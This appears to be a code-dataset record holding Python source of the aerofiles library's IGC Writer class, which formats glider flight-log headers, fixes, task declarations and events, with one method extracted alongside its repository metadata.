if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_fix_accuracy | python | def write_fix_accuracy(self, accuracy=None):
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy) | Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L153-L173 | null | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
